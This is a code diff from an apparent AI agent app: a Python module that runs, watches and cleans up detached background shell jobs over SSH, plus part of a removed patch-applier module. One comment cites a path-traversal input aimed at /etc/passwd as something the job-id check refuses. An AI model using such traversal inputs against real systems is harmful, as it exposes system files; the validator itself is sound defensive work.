||||
log = logging.getLogger(__name__)
|
||||
|
||||
# Where a job's files live on the far side. `${TMPDIR:-/tmp}` so a host that
|
||||
# puts scratch space elsewhere is honoured, and it clears on reboot -- a job
|
||||
# does not survive a reboot of its own host either. The chat id namespaces it,
|
||||
# which is also what makes cross-chat access structurally impossible: a path is
|
||||
# only ever built from the *calling* chat's id, so a model in one chat cannot
|
||||
# name another chat's files.
|
||||
JOB_ROOT = "${TMPDIR:-/tmp}/lembas-jobs"
|
||||
|
||||
# A job id is our own short hex; anything else is refused before it reaches a
|
||||
# path, so `job_output("../../etc/passwd")` cannot walk out of the job root.
|
||||
_ID = re.compile(r"^[a-f0-9]{12}$")
|
||||
|
||||
# How long the fire-and-return launcher waits for the shell to accept the
|
||||
# command. Not the command's own timeout -- it returns the moment the process is
|
||||
# detached, which is immediate.
|
||||
LAUNCH_GRACE = 10.0
|
||||
|
||||
# The working set, keyed by job id: what `job_list` shows this session. Mirrored
|
||||
# to a `Job` row for jobs that are watched, so a restart can rehydrate them.
|
||||
_JOBS: dict[str, JobState] = {}
|
||||
# One watcher task per job being polled to completion.
|
||||
_WATCHERS: dict[str, asyncio.Task] = {}
|
||||
|
||||
# Stop watching a job after this. The remote process may keep running; we simply
|
||||
# stop holding a watcher for it and mark it lost. A job that runs longer than
|
||||
# this is beyond what auto-wake promises.
|
||||
MAX_WATCH_SECONDS = 6 * 3600
|
||||
|
||||
# How much of a finished job's output is put in front of the model when it is
|
||||
# woken. Capped so a job that printed a gigabyte does not blow the window.
|
||||
MAX_COMPLETION_CHARS = 4000
|
||||
|
||||
|
||||
def new_id() -> str:
|
||||
return uuid.uuid4().hex[:12]
|
||||
|
||||
|
||||
@dataclass
|
||||
class JobState:
|
||||
"""What LLeMbas remembers about one background job, in this process."""
|
||||
|
||||
id: str
|
||||
chat_id: str
|
||||
command: str
|
||||
status: str = "running" # running | done | killed | lost
|
||||
exit_status: int | None = None
|
||||
started_at: float = field(default_factory=time.monotonic)
|
||||
finished_at: float = 0.0
|
||||
|
||||
|
||||
# --- Paths and the wrappers ----------------------------------------------------
|
||||
def _dir(chat_id: str) -> str:
|
||||
return f'"{JOB_ROOT}/{chat_id}"'
|
||||
|
||||
|
||||
def _file(chat_id: str, job_id: str, ext: str) -> str:
|
||||
# Double-quoted so `${TMPDIR:-/tmp}` still expands while the whole path stays
|
||||
# one word. The chat id and job id are hex, so nothing here needs escaping.
|
||||
return f'"{JOB_ROOT}/{chat_id}/{job_id}.{ext}"'
|
||||
|
||||
|
||||
def _sentinel(job_id: str) -> str:
|
||||
return f"__LEMBAS_{job_id}__"
|
||||
|
||||
|
||||
def _inner_script(chat_id: str, job_id: str, command: str) -> str:
|
||||
"""The detached program: record the pid, run the command, record the status.
|
||||
|
||||
base64-encoded before it leaves, so `command` is bytes and never shell
|
||||
syntax. `$$` first, because it is the session leader's pid under setsid and
|
||||
`job_stop` kills the group by it. `$?` last, capturing the command's status;
|
||||
it is the file `run`'s own exit status must never be read in place of.
|
||||
"""
|
||||
return (
|
||||
f"echo $$ > {_file(chat_id, job_id, 'pid')}\n"
|
||||
f"{command}\n"
|
||||
f"echo $? > {_file(chat_id, job_id, 'exit')}\n"
|
||||
)
|
||||
|
||||
|
||||
def _blob(chat_id: str, job_id: str, command: str) -> str:
|
||||
raw = _inner_script(chat_id, job_id, command).encode("utf-8")
|
||||
return base64.b64encode(raw).decode("ascii")
|
||||
|
||||
|
||||
def _launch_lines(chat_id: str, job_id: str, command: str) -> str:
|
||||
"""Create the job dir, drop the script, and detach it. No wait."""
|
||||
blob = _blob(chat_id, job_id, command)
|
||||
return (
|
||||
f"mkdir -p {_dir(chat_id)} 2>/dev/null\n"
|
||||
f"printf %s '{blob}' | base64 -d > {_file(chat_id, job_id, 'sh')}\n"
|
||||
f"setsid sh {_file(chat_id, job_id, 'sh')} "
|
||||
f"> {_file(chat_id, job_id, 'log')} 2>&1 < /dev/null &\n"
|
||||
)
|
||||
|
||||
|
||||
def launch_command(chat_id: str, job_id: str, command: str) -> str:
|
||||
"""Fire-and-return: detach the command and stop. Run with a short timeout."""
|
||||
return _launch_lines(chat_id, job_id, command) + "printf started\n"
|
||||
|
||||
|
||||
def launch_and_wait_command(chat_id: str, job_id: str, command: str, max_bytes: int) -> str:
|
||||
"""Detach the command AND wait up to the (asyncssh) timeout for it.
|
||||
|
||||
If it finishes, stdout is the log tail plus a sentinel line carrying the exit
|
||||
code, and the files are removed. If asyncssh times out first the channel is
|
||||
torn down before the `rm`, so the files survive for a later read and the
|
||||
detached process -- new session, redirected, stdin from /dev/null -- keeps
|
||||
running. That torn-down-mid-wait case is exactly "it became a background
|
||||
job".
|
||||
"""
|
||||
s = _sentinel(job_id)
|
||||
pid = _file(chat_id, job_id, "pid")
|
||||
exit_ = _file(chat_id, job_id, "exit")
|
||||
logf = _file(chat_id, job_id, "log")
|
||||
return (
|
||||
_launch_lines(chat_id, job_id, command)
|
||||
+ "while :; do\n"
|
||||
f" [ -f {exit_} ] && break\n"
|
||||
f" __p=$(cat {pid} 2>/dev/null)\n"
|
||||
' [ -n "$__p" ] && ! kill -0 "$__p" 2>/dev/null && break\n'
|
||||
# 0.2s: with the feature on, every ordinary command waits one poll for
|
||||
# the exit-file, so this is added latency on the hot path. Short enough
|
||||
# not to be felt, long enough not to spin.
|
||||
" sleep 0.2\n"
|
||||
"done\n"
|
||||
f"tail -c {max_bytes} {logf} 2>/dev/null\n"
|
||||
f"printf '\\n{s}:'\n"
|
||||
f"cat {exit_} 2>/dev/null || printf LOST\n"
|
||||
# `logf`, not `log`. The module logger is a perfectly good f-string
|
||||
# operand and formats to "<Logger … (WARNING)>", whose angle brackets and
|
||||
# parentheses are shell syntax -- so this line died with a syntax error,
|
||||
# after the sentinel where nothing reads it, and every job's four files
|
||||
# were left on the far side forever. See the note in the working notes.
|
||||
f"rm -f {_file(chat_id, job_id, 'sh')} {pid} {logf} {exit_}\n"
|
||||
)
|
||||
|
||||
|
||||
def read_command(chat_id: str, job_id: str, max_bytes: int) -> str:
|
||||
"""The log so far, and whether the job is still running."""
|
||||
s = _sentinel(job_id)
|
||||
pid = _file(chat_id, job_id, "pid")
|
||||
exit_ = _file(chat_id, job_id, "exit")
|
||||
return (
|
||||
f"tail -c {max_bytes} {_file(chat_id, job_id, 'log')} 2>/dev/null\n"
|
||||
f"printf '\\n{s}:'\n"
|
||||
f"if [ -f {exit_} ]; then printf 'done '; cat {exit_};\n"
|
||||
f'elif __p=$(cat {pid} 2>/dev/null); [ -n "$__p" ] && kill -0 "$__p" 2>/dev/null;'
|
||||
" then printf running;\n"
|
||||
"else printf lost; fi\n"
|
||||
)
|
||||
|
||||
|
||||
def stop_command(chat_id: str, job_id: str) -> str:
|
||||
"""Kill the whole process group, then record an exit so a reader is not told
|
||||
the job is merely lost. A killed process never writes its own exit file."""
|
||||
pid = _file(chat_id, job_id, "pid")
|
||||
exit_ = _file(chat_id, job_id, "exit")
|
||||
return (
|
||||
f'__p=$(cat {pid} 2>/dev/null); [ -n "$__p" ] && kill -TERM -"$__p" 2>/dev/null\n'
|
||||
"sleep 0.3\n"
|
||||
f'[ -n "$__p" ] && kill -KILL -"$__p" 2>/dev/null\n'
|
||||
f"[ -f {exit_} ] || echo 143 > {exit_}\n"
|
||||
"printf stopped\n"
|
||||
)
|
||||
|
||||
|
||||
def cleanup_command(chat_id: str, job_id: str) -> str:
|
||||
return (
|
||||
f"rm -f {_file(chat_id, job_id, 'sh')} {_file(chat_id, job_id, 'pid')} "
|
||||
f"{_file(chat_id, job_id, 'log')} {_file(chat_id, job_id, 'exit')}\n"
|
||||
)
|
||||
|
||||
|
||||
# --- Parsing what a wrapper printed --------------------------------------------
|
||||
@dataclass(frozen=True)
|
||||
class Completed:
|
||||
body: str
|
||||
exit_status: int | None # None ⇒ the job was lost (killed without an exit)
|
||||
|
||||
|
||||
def parse_completed(output: str, job_id: str) -> Completed:
|
||||
"""Split a launch-and-wait result into the command's output and its status.
|
||||
|
||||
On the *last* sentinel, because the command's own output could contain a
|
||||
line that looks like one; everything before it is the body, everything after
|
||||
is the exit code the file held.
|
||||
"""
|
||||
marker = f"\n{_sentinel(job_id)}:"
|
||||
at = output.rfind(marker)
|
||||
if at == -1:
|
||||
return Completed(body=output.strip(), exit_status=None)
|
||||
body = output[:at].strip()
|
||||
tail = output[at + len(marker) :].strip()
|
||||
if tail.upper() == "LOST" or not tail:
|
||||
return Completed(body=body, exit_status=None)
|
||||
try:
|
||||
return Completed(body=body, exit_status=int(tail.split()[0]))
|
||||
except (ValueError, IndexError):
|
||||
return Completed(body=body, exit_status=None)
|
||||
|
||||
|
||||
@dataclass(frozen=True)
|
||||
class Reading:
|
||||
body: str
|
||||
status: str # running | done | lost
|
||||
exit_status: int | None
|
||||
|
||||
|
||||
def parse_reading(output: str, job_id: str) -> Reading:
|
||||
marker = f"\n{_sentinel(job_id)}:"
|
||||
at = output.rfind(marker)
|
||||
if at == -1:
|
||||
return Reading(body=output.strip(), status="lost", exit_status=None)
|
||||
body = output[:at].strip()
|
||||
tail = output[at + len(marker) :].strip()
|
||||
if tail.startswith("done"):
|
||||
parts = tail.split()
|
||||
code = int(parts[1]) if len(parts) > 1 and parts[1].lstrip("-").isdigit() else None
|
||||
return Reading(body=body, status="done", exit_status=code)
|
||||
if tail == "running":
|
||||
return Reading(body=body, status="running", exit_status=None)
|
||||
return Reading(body=body, status="lost", exit_status=None)
|
||||
|
||||
|
||||
# --- Operations against the machine --------------------------------------------
|
||||
async def launch(agent, command: str, cwd: str = "") -> JobState:
|
||||
"""Detach a command and return immediately. Raises ExecError if it will not
|
||||
even start."""
|
||||
job_id = new_id()
|
||||
result = await agent.executor().run(
|
||||
ExecRequest(
|
||||
command=launch_command(agent.chat_id, job_id, command),
|
||||
cwd=cwd,
|
||||
timeout=LAUNCH_GRACE,
|
||||
max_bytes=agent.max_output,
|
||||
)
|
||||
)
|
||||
if result.timed_out:
|
||||
raise ExecError("The machine did not accept the command in time.")
|
||||
job = JobState(id=job_id, chat_id=agent.chat_id, command=command)
|
||||
_JOBS[job_id] = job
|
||||
return job
|
||||
|
||||
|
||||
async def read(agent, job_id: str) -> Reading:
|
||||
output, _ = _clean(
|
||||
await agent.executor().run(
|
||||
ExecRequest(
|
||||
command=read_command(agent.chat_id, job_id, agent.max_output),
|
||||
timeout=agent.timeout,
|
||||
max_bytes=agent.max_output,
|
||||
)
|
||||
),
|
||||
agent.max_output,
|
||||
)
|
||||
reading = parse_reading(output, job_id)
|
||||
_record(job_id, reading.status, reading.exit_status)
|
||||
if reading.status in ("done", "lost"):
|
||||
await _cleanup(agent, job_id)
|
||||
return reading
|
||||
|
||||
|
||||
async def stop(agent, job_id: str) -> None:
|
||||
await agent.executor().run(
|
||||
ExecRequest(command=stop_command(agent.chat_id, job_id), timeout=agent.timeout)
|
||||
)
|
||||
_record(job_id, "killed", 143)
|
||||
|
||||
|
||||
async def _cleanup(agent, job_id: str) -> None:
|
||||
with contextlib.suppress(ExecError):
|
||||
await agent.executor().run(
|
||||
ExecRequest(command=cleanup_command(agent.chat_id, job_id), timeout=agent.timeout)
|
||||
)
|
||||
|
||||
|
||||
def _clean(result, limit: int) -> tuple[str, bool]:
|
||||
if result.timed_out:
|
||||
return result.output, False
|
||||
return clean_output(result.output or "", limit=limit)
|
||||
|
||||
|
||||
# --- The registry --------------------------------------------------------------
|
||||
def register(job: JobState) -> None:
|
||||
_JOBS[job.id] = job
|
||||
|
||||
|
||||
def get(job_id: str) -> JobState | None:
|
||||
return _JOBS.get(job_id)
|
||||
|
||||
|
||||
def for_chat(chat_id: str) -> list[JobState]:
|
||||
return [j for j in _JOBS.values() if j.chat_id == chat_id]
|
||||
|
||||
|
||||
def valid_id(job_id: str) -> bool:
|
||||
return bool(_ID.match(job_id or ""))
|
||||
|
||||
|
||||
@dataclass(frozen=True)
|
||||
class JobView:
|
||||
"""One job as a person sees it, rather than as the watcher tracks it.
|
||||
|
||||
Two sources, because neither is complete on its own. The `agent_jobs` row is
|
||||
what survives a restart and carries wall-clock times; `JobState` is what this
|
||||
process knows now, and it exists for a job whose row could not be written --
|
||||
`_persist_row` is best-effort by design, so a job with no row is still a job
|
||||
that is running.
|
||||
|
||||
Times are wall clock, from the row. `JobState.started_at` is
|
||||
`time.monotonic()`, which is right for measuring an interval inside one
|
||||
process and meaningless across a restart: `rehydrate` builds a fresh
|
||||
`JobState` whose clock starts at nought, so a job that had been running for
|
||||
three hours would report having started a moment ago.
|
||||
"""
|
||||
|
||||
id: str
|
||||
command: str
|
||||
status: str
|
||||
exit_status: int | None = None
|
||||
started_at: Any = None
|
||||
finished_at: Any = None
|
||||
|
||||
@property
|
||||
def running(self) -> bool:
|
||||
return self.status == "running"
|
||||
|
||||
@property
|
||||
def tone(self) -> str:
|
||||
"""What colour this job is, which is not the question `status` answers.
|
||||
|
||||
`done` is two outcomes. The row beside the dot already tells them apart
|
||||
in words -- "Finished" against "Failed, exit 2" -- so a dot keyed on the
|
||||
status would be green next to a sentence saying the opposite.
|
||||
|
||||
The *wording* stays in the template's if-chain rather than moving here
|
||||
beside the colour. Authored text belongs in the file somebody reads to
|
||||
change it, and saving one branch is not worth taking five phrases out of
|
||||
it; this is the half that cannot be said in a class name.
|
||||
"""
|
||||
if self.running:
|
||||
return "running"
|
||||
if self.status != "done":
|
||||
return self.status # killed, lost
|
||||
return "ok" if not self.exit_status else "failed"
|
||||
|
||||
@property
|
||||
def duration(self) -> str:
|
||||
"""How long it took, once it is over. Empty while it is still running.
|
||||
|
||||
Empty on purpose rather than for want of an answer. This panel is
|
||||
fetched when somebody opens it and is never polled -- the chip beside
|
||||
the composer is what refreshes on a timer -- so a live "running for
|
||||
2m 05s" would be stale the instant it painted and stay stale until the
|
||||
reader pressed something. The chip says something is still going; this
|
||||
says how long the finished ones took, which is true forever.
|
||||
|
||||
Both stamps are normalised before subtracting, for the reason
|
||||
`compaction.moment` normalises: SQLite stores no offset, so a row read
|
||||
back from disk is naive while one still in the session's identity map
|
||||
keeps its tzinfo, and subtracting one from the other raises. `moment`
|
||||
itself is not reused because it takes a `Message`, not a stamp.
|
||||
"""
|
||||
if self.running or self.started_at is None or self.finished_at is None:
|
||||
return ""
|
||||
seconds = (_aware(self.finished_at) - _aware(self.started_at)).total_seconds()
|
||||
return _short_duration(seconds) if seconds >= 0 else ""
|
||||
|
||||
|
||||
def _aware(stamp: datetime) -> datetime:
|
||||
"""A stamp that can be subtracted from another. See `JobView.duration`."""
|
||||
return stamp if stamp.tzinfo is not None else stamp.replace(tzinfo=UTC)
|
||||
|
||||
|
||||
def _short_duration(seconds: float) -> str:
|
||||
"""A wall-clock span, at the precision somebody reading a log cares about.
|
||||
|
||||
Deliberately not `steps._short_duration`. That one takes milliseconds, tops
|
||||
out at minutes and is tuned to a label repainting beside an animating word;
|
||||
a three-hour build through it reads `184m 12s`. This one is written for a
|
||||
span that can be hours and is only ever rendered once it is final.
|
||||
"""
|
||||
total = int(seconds)
|
||||
if total < 60:
|
||||
return f"{total}s"
|
||||
if total < 3600:
|
||||
return f"{total // 60}m {total % 60:02d}s"
|
||||
return f"{total // 3600}h {(total % 3600) // 60:02d}m"
|
||||
|
||||
|
||||
def listing(db, chat_id: str) -> list[JobView]:
|
||||
"""Every job this chat has, newest first.
|
||||
|
||||
Live state wins over the stored row where they disagree. They should not --
|
||||
`_record` writes the row as it updates the state -- but the row write is the
|
||||
half allowed to fail, so preferring the fresher of the two is what keeps a
|
||||
finished job from being shown as running for ever.
|
||||
"""
|
||||
from lembas.db.models import Job
|
||||
|
||||
live = {job.id: job for job in for_chat(chat_id)}
|
||||
views: list[JobView] = []
|
||||
seen: set[str] = set()
|
||||
|
||||
rows = db.scalars(
|
||||
select(Job).where(Job.chat_id == chat_id).order_by(Job.created_at.desc())
|
||||
)
|
||||
for row in rows:
|
||||
state = live.get(row.id)
|
||||
seen.add(row.id)
|
||||
views.append(
|
||||
JobView(
|
||||
id=row.id,
|
||||
command=row.command or "",
|
||||
status=state.status if state is not None else row.status,
|
||||
exit_status=state.exit_status if state is not None else row.exit_status,
|
||||
started_at=row.created_at,
|
||||
finished_at=row.finished_at,
|
||||
)
|
||||
)
|
||||
|
||||
# A job whose row never got written. It has no start time to show, which is
|
||||
# honest: nothing recorded one.
|
||||
for job in live.values():
|
||||
if job.id not in seen:
|
||||
views.insert(
|
||||
0,
|
||||
JobView(
|
||||
id=job.id,
|
||||
command=job.command,
|
||||
status=job.status,
|
||||
exit_status=job.exit_status,
|
||||
),
|
||||
)
|
||||
return views
|
||||
|
||||
|
||||
def running_count(db, chat_id: str) -> int:
|
||||
return sum(1 for view in listing(db, chat_id) if view.running)
|
||||
|
||||
|
||||
def _record(job_id: str, status: str, exit_status: int | None) -> None:
|
||||
job = _JOBS.get(job_id)
|
||||
if job is None or job.status != "running":
|
||||
return
|
||||
if status in ("done", "lost", "killed"):
|
||||
job.status = status
|
||||
job.exit_status = exit_status
|
||||
job.finished_at = time.monotonic()
|
||||
_persist_row(job)
|
||||
|
||||
|
||||
def clear() -> None:
|
||||
_JOBS.clear()
|
||||
|
||||
|
||||
# --- Durable record ------------------------------------------------------------
|
||||
# Best-effort throughout: a job whose row cannot be written (a test with no real
|
||||
# chat, a transient database hiccup) still runs and is still tracked in-process;
|
||||
# it just will not survive a restart, which is the row's only purpose.
|
||||
def _persist_row(job: JobState) -> None:
|
||||
from lembas.db.models import Job
|
||||
from lembas.db.session import session_scope
|
||||
|
||||
try:
|
||||
with session_scope() as db:
|
||||
row = db.get(Job, job.id)
|
||||
if row is None:
|
||||
row = Job(id=job.id, chat_id=job.chat_id)
|
||||
db.add(row)
|
||||
row.command = job.command[:4000]
|
||||
row.status = job.status
|
||||
row.exit_status = job.exit_status
|
||||
row.finished_at = None if job.status == "running" else datetime.now(UTC)
|
||||
except Exception: # noqa: BLE001 - the row is a convenience, not the job
|
||||
log.debug("could not persist job %s", job.id, exc_info=True)
|
||||
|
||||
|
||||
# --- The watcher ---------------------------------------------------------------
|
||||
def _poll_interval(elapsed: float) -> float:
|
||||
if elapsed < 30:
|
||||
return 3.0
|
||||
if elapsed < 300:
|
||||
return 10.0
|
||||
return 25.0
|
||||
|
||||
|
||||
def start_watch(agent, job: JobState) -> None:
|
||||
"""Poll a job to completion and, when it finishes, wake the model.
|
||||
|
||||
Only when notify is on -- the watcher's whole job is the wake and the status
|
||||
update, and without notify the model reads `job_output` itself, which
|
||||
updates the status anyway. Capped by `background_max_jobs`: past it a job
|
||||
still runs and can be read, it simply is not watched.
|
||||
|
||||
The credential is copied, not referenced: `generation` clears the agent's
|
||||
`spec` when the reply ends, and the watcher outlives the reply. Holding the
|
||||
copy for the job's life is the same trade the terminal makes for a held
|
||||
shell.
|
||||
"""
|
||||
_persist_row(job)
|
||||
if not agent.background_notify or len(_WATCHERS) >= agent.background_max_jobs:
|
||||
return
|
||||
task = asyncio.create_task(
|
||||
_watch(
|
||||
dict(agent.spec),
|
||||
agent.project_dir,
|
||||
job.chat_id,
|
||||
job.id,
|
||||
job.command,
|
||||
agent.max_output,
|
||||
)
|
||||
)
|
||||
_WATCHERS[job.id] = task
|
||||
|
||||
|
||||
async def _watch(
|
||||
spec: dict, project_dir: str, chat_id: str, job_id: str, command: str, max_output: int
|
||||
) -> None:
|
||||
from lembas.services.agent.ssh import SshExecutor
|
||||
|
||||
started = time.monotonic()
|
||||
try:
|
||||
while True:
|
||||
await asyncio.sleep(_poll_interval(time.monotonic() - started))
|
||||
if time.monotonic() - started > MAX_WATCH_SECONDS:
|
||||
_record(job_id, "lost", None)
|
||||
return
|
||||
try:
|
||||
result = await SshExecutor(spec, project_dir).run(
|
||||
ExecRequest(
|
||||
command=read_command(chat_id, job_id, max_output),
|
||||
timeout=30,
|
||||
max_bytes=max_output,
|
||||
)
|
||||
)
|
||||
except ExecError:
|
||||
continue # transient -- the host is briefly unreachable; retry
|
||||
if result.timed_out:
|
||||
continue
|
||||
output, _ = clean_output(result.output or "", limit=max_output)
|
||||
reading = parse_reading(output, job_id)
|
||||
if reading.status in ("done", "lost"):
|
||||
_record(job_id, reading.status, reading.exit_status)
|
||||
with contextlib.suppress(ExecError):
|
||||
await SshExecutor(spec, project_dir).run(
|
||||
ExecRequest(command=cleanup_command(chat_id, job_id), timeout=30)
|
||||
)
|
||||
await wake(chat_id, job_id, command, reading.status, reading.exit_status,
|
||||
reading.body)
|
||||
return
|
||||
except asyncio.CancelledError:
|
||||
raise
|
||||
except Exception: # noqa: BLE001 - a watcher that dies must not take others
|
||||
log.exception("job watcher for %s raised", job_id)
|
||||
finally:
|
||||
_WATCHERS.pop(job_id, None)
|
||||
|
||||
|
||||
# --- Waking the model ----------------------------------------------------------
|
||||
def _completion_text(
|
||||
job_id: str, command: str, status: str, exit_status: int | None, output: str
|
||||
) -> str:
|
||||
if status == "done" and exit_status == 0:
|
||||
line = "It finished successfully."
|
||||
elif status == "done":
|
||||
line = f"It exited {exit_status}."
|
||||
else:
|
||||
line = "It stopped without an exit status (it may have been killed)."
|
||||
body = (output or "").strip()[:MAX_COMPLETION_CHARS]
|
||||
# A fence for the model's benefit; backticks in the output are neutralised so
|
||||
# they cannot close it, the same move `instructions.clean` makes.
|
||||
fenced = f"\n\n```\n{body.replace('```', chr(39) * 3)}\n```" if body else ""
|
||||
return (
|
||||
f"A background job you started has finished — this is a machine event, "
|
||||
f"not the person speaking.\n\n"
|
||||
f"[job {job_id}] `{command}`\n{line}{fenced}"
|
||||
)
|
||||
|
||||
|
||||
async def wake(
|
||||
chat_id: str, job_id: str, command: str, status: str, exit_status: int | None, output: str
|
||||
) -> None:
|
||||
"""Tell the model a job finished, as a new turn.
|
||||
|
||||
Reuses the queue: if a reply is being written, the completion is left
|
||||
`queued` for that reply's `_inject`/`_drain` to deliver; if the chat is idle,
|
||||
a fresh reply is started to answer it, the `send_queued_now` move.
|
||||
|
||||
The lock discipline that makes that safe lives in `services/wake.py`, which
|
||||
is the one copy of it -- schedules need the identical rule, and two lock
|
||||
dictionaries for one invariant is how one of them drifts. What stays here is
|
||||
the *wording*, because `tool.background` quotes `_completion_text`'s opening
|
||||
sentence to the model and rewording it would break that instruction with
|
||||
nothing anywhere to notice.
|
||||
"""
|
||||
from lembas.services import wake as wake_service
|
||||
|
||||
await wake_service.wake_chat(
|
||||
chat_id, _completion_text(job_id, command, status, exit_status, output)
|
||||
)
|
||||
|
||||
|
||||
# --- Rehydration and shutdown --------------------------------------------------
|
||||
def rehydrate() -> None:
|
||||
"""After a restart, watch again the jobs that were still running.
|
||||
|
||||
Their remote files are keyed deterministically on chat and id, so a fresh
|
||||
watcher re-polls them and wakes the model as if nothing happened -- which is
|
||||
the whole reason the row exists. Best-effort per job: a host that is down, a
|
||||
profile that is gone, a chat that was deleted each just drop that one.
|
||||
"""
|
||||
from lembas.db.models import Chat, SshProfile
|
||||
from lembas.db.session import session_scope
|
||||
from lembas.services import settings_store
|
||||
from lembas.services.agent import ssh as ssh_service
|
||||
|
||||
with session_scope() as db:
|
||||
values = settings_store.agents(db)
|
||||
if not values.get("enabled") or not values.get("background_notify"):
|
||||
return
|
||||
max_output = int(values.get("max_output_bytes") or 64 * 1024)
|
||||
running = list(db.scalars(_running_rows()))
|
||||
for row in running:
|
||||
chat = db.get(Chat, row.chat_id)
|
||||
if chat is None or not chat.ssh_profile_id:
|
||||
continue
|
||||
profile = db.get(SshProfile, chat.ssh_profile_id)
|
||||
if profile is None or not profile.enabled:
|
||||
continue
|
||||
spec = ssh_service.spec_from(profile)
|
||||
project_dir = chat.project_dir or profile.default_dir or ""
|
||||
job = JobState(id=row.id, chat_id=row.chat_id, command=row.command)
|
||||
_JOBS[job.id] = job
|
||||
if len(_WATCHERS) >= int(values.get("background_max_jobs") or 5):
|
||||
break
|
||||
_WATCHERS[job.id] = asyncio.create_task(
|
||||
_watch(spec, project_dir, row.chat_id, row.id, row.command, max_output)
|
||||
)
|
||||
|
||||
|
||||
def _running_rows():
|
||||
from sqlalchemy import select
|
||||
|
||||
from lembas.db.models import Job
|
||||
|
||||
return select(Job).where(Job.status == "running")
|
||||
|
||||
|
||||
async def shutdown() -> None:
|
||||
"""Cancel every watcher. The detached remote jobs are unaffected -- they run
|
||||
on, and a later start rehydrates them from their rows."""
|
||||
tasks = list(_WATCHERS.values())
|
||||
_WATCHERS.clear()
|
||||
for task in tasks:
|
||||
task.cancel()
|
||||
for task in tasks:
|
||||
with contextlib.suppress(asyncio.CancelledError, Exception):
|
||||
await task
|
||||
|
||||
|
||||
__all__ = [
|
||||
"JOB_ROOT",
|
||||
"Completed",
|
||||
"JobState",
|
||||
"Reading",
|
||||
"clear",
|
||||
"for_chat",
|
||||
"get",
|
||||
"launch",
|
||||
"launch_and_wait_command",
|
||||
"new_id",
|
||||
"parse_completed",
|
||||
"read",
|
||||
"register",
|
||||
"stop",
|
||||
"valid_id",
|
||||
]
|
||||
@@ -1,313 +0,0 @@
|
||||
"""Applying a unified diff, and rendering one.
|
||||
|
||||
`difflib` produces a unified diff and cannot apply one, so `render` uses it and
|
||||
`apply` is written here. No new dependency: hard rule 1 is about the browser,
|
||||
but a patch applier is fifty lines and pulling a package in for it would be
|
||||
worse than the fifty lines.
|
||||
|
||||
Four behaviours carry the whole module, and each of them exists because of how
|
||||
models actually write patches rather than how the format is specified.
|
||||
|
||||
**Fuzzy offset, exact content.** A hunk's `@@ -41,7 +41,8 @@` is a hint and
|
||||
nothing more. Models get line numbers wrong constantly -- they count from a
|
||||
truncated read, or from the file as it was three edits ago -- and get the
|
||||
context lines right. So the hinted position is tried first and then the file is
|
||||
scanned outward for an exact match of the context block. One match wins; more
|
||||
than one refuses, because guessing which of two identical blocks was meant is
|
||||
the one failure that silently corrupts a file.
|
||||
|
||||
**Line endings are normalised in and restored out.** A CRLF file otherwise
|
||||
fails on every single hunk, on context that looks identical in the error
|
||||
message, which is unfixable from the model's side.
|
||||
|
||||
**A blank context line may have lost its leading space.** Trailing whitespace
|
||||
is stripped by half the things a model's output passes through, so `""` is read
|
||||
as a blank context line rather than as a malformed one.
|
||||
|
||||
**Nothing is written unless every hunk applies.** The new text is built whole in
|
||||
memory and handed back; a half-applied file is worse than a refused one, and the
|
||||
model cannot tell the difference without reading it again.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import difflib
|
||||
import re
|
||||
from dataclasses import dataclass
|
||||
|
||||
# A patch bigger than this is a rewrite wearing a diff's clothes, and
|
||||
# `file_write` is the tool for that.
|
||||
MAX_HUNKS = 60
|
||||
|
||||
# How far either side of the hinted line to look for the context block. Wide
|
||||
# enough for a file that has grown a few hundred lines since the model read it,
|
||||
# narrow enough that an accidental match is unlikely.
|
||||
MAX_DRIFT = 200
|
||||
|
||||
_HEADER = re.compile(r"^@@\s*-(\d+)(?:,(\d+))?\s+\+(\d+)(?:,(\d+))?\s*@@")
|
||||
_NO_NEWLINE = "\\ No newline at end of file"
|
||||
|
||||
|
||||
class PatchError(Exception):
|
||||
"""A patch that did not apply, said precisely enough to retry from."""
|
||||
|
||||
def __init__(self, message: str, *, hunk: int = 0) -> None:
|
||||
super().__init__(message)
|
||||
self.message = message
|
||||
self.hunk = hunk
|
||||
|
||||
|
||||
@dataclass(frozen=True)
|
||||
class Hunk:
|
||||
old_start: int
|
||||
old_count: int
|
||||
new_start: int
|
||||
new_count: int
|
||||
# Each line still carrying its ' ', '+' or '-'.
|
||||
lines: tuple[str, ...]
|
||||
# A `\ No newline at end of file` marker followed a line this hunk *adds*,
|
||||
# so the result is meant to end without one. Honoured only when the hunk
|
||||
# actually reaches the end of the file -- git emits the marker for the old
|
||||
# side too, and reading that as an instruction would strip a newline the
|
||||
# patch never touched.
|
||||
ends_without_newline: bool = False
|
||||
|
||||
@property
|
||||
def before(self) -> tuple[str, ...]:
|
||||
"""The lines this hunk expects to find, without their markers."""
|
||||
return tuple(line[1:] for line in self.lines if line[:1] in (" ", "-"))
|
||||
|
||||
@property
|
||||
def after(self) -> tuple[str, ...]:
|
||||
return tuple(line[1:] for line in self.lines if line[:1] in (" ", "+"))
|
||||
|
||||
|
||||
def parse(patch: str) -> list[Hunk]:
|
||||
"""Read a unified diff into hunks.
|
||||
|
||||
File headers are tolerated and ignored -- `diff --git`, `index`, `---`,
|
||||
`+++` -- because models emit them by habit and refusing would cost a round
|
||||
trip to say so. The `@@` header is required: without one there is nothing to
|
||||
anchor against, and the resulting error is at least mechanical to fix.
|
||||
"""
|
||||
hunks: list[Hunk] = []
|
||||
state: dict = {"header": None, "body": [], "bare": False}
|
||||
|
||||
def flush() -> None:
|
||||
if state["header"] is None:
|
||||
return
|
||||
hunks.append(
|
||||
Hunk(
|
||||
*state["header"],
|
||||
lines=tuple(state["body"]),
|
||||
ends_without_newline=state["bare"],
|
||||
)
|
||||
)
|
||||
state["header"] = None
|
||||
state["body"] = []
|
||||
state["bare"] = False
|
||||
|
||||
body = (patch or "").replace("\r\n", "\n").replace("\r", "\n").split("\n")
|
||||
# The patch's own final newline, not a blank context line. Without this every
|
||||
# well-formed patch acquires one phantom line of context at the end and
|
||||
# matches nothing -- which looks exactly like the model getting it wrong.
|
||||
if body and body[-1] == "":
|
||||
body.pop()
|
||||
|
||||
for raw in body:
|
||||
matched = _HEADER.match(raw)
|
||||
if matched:
|
||||
flush()
|
||||
state["header"] = (
|
||||
int(matched.group(1)),
|
||||
int(matched.group(2) or 1),
|
||||
int(matched.group(3)),
|
||||
int(matched.group(4) or 1),
|
||||
)
|
||||
continue
|
||||
|
||||
if state["header"] is None:
|
||||
# Preamble. Anything before the first @@ is a file header we do not
|
||||
# need: the path is a parameter, not something read out of the diff.
|
||||
continue
